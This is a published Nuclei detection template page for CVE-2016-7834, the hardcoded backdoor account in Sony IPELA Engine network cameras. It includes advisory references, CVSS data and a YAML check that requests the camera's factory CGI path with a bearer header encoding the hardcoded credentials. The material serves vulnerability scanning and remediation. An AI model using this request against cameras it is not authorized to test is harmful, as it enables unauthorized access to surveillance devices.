Sony IPELA Engine IP Camera - Hardcoded Account
ID: CVE-2016-7834
Severity: high
Author: af001
Tags: cve2016,cve,sony,backdoor,unauth,telnet,iot,camera
Description
Section titled “Description”Multiple SONY network cameras are vulnerable to sensitive information disclosure via hardcoded credentials.
YAML Source
Section titled “YAML Source”id: CVE-2016-7834
info: name: Sony IPELA Engine IP Camera - Hardcoded Account author: af001 severity: high description: | Multiple SONY network cameras are vulnerable to sensitive information disclosure via hardcoded credentials. impact: | An attacker can gain unauthorized access to the camera and potentially control its functions. remediation: | Upgrade to the latest version of the firmware provided by Sony. reference: - https://sec-consult.com/vulnerability-lab/advisory/backdoor-vulnerability-in-sony-ipela-engine-ip-cameras/ - https://www.bleepingcomputer.com/news/security/backdoor-found-in-80-sony-surveillance-camera-models/ - https://jvn.jp/en/vu/JVNVU96435227/index.html - https://nvd.nist.gov/vuln/detail/CVE-2016-7834 - https://www.sony.co.uk/pro/article/sony-new-firmware-for-network-cameras classification: cvss-metrics: CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2016-7834 cwe-id: CWE-200 epss-score: 0.00186 epss-percentile: 0.55834 cpe: cpe:2.3:o:sony:snc_series_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: sony product: snc_series_firmware tags: cve2016,cve,sony,backdoor,unauth,telnet,iot,camera
http: - method: GET path: - "{{BaseURL}}/command/prima-factory.cgi"
headers: Authorization: Bearer cHJpbWFuYTpwcmltYW5h
matchers-condition: and matchers: - type: word part: header words: - 'gen5th' - 'gen6th' condition: or
- type: status status: - 204# digest: 4b0a00483046022100a29a278592acb320b9ef5f9b5a78d00d8cf832ad1df790219124c691b85b641c022100d21ce7e70c11821628ea596dc04091f0639e00d60946ccf0bf5094daf6d22e1e:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2016/CVE-2016-7834.yaml"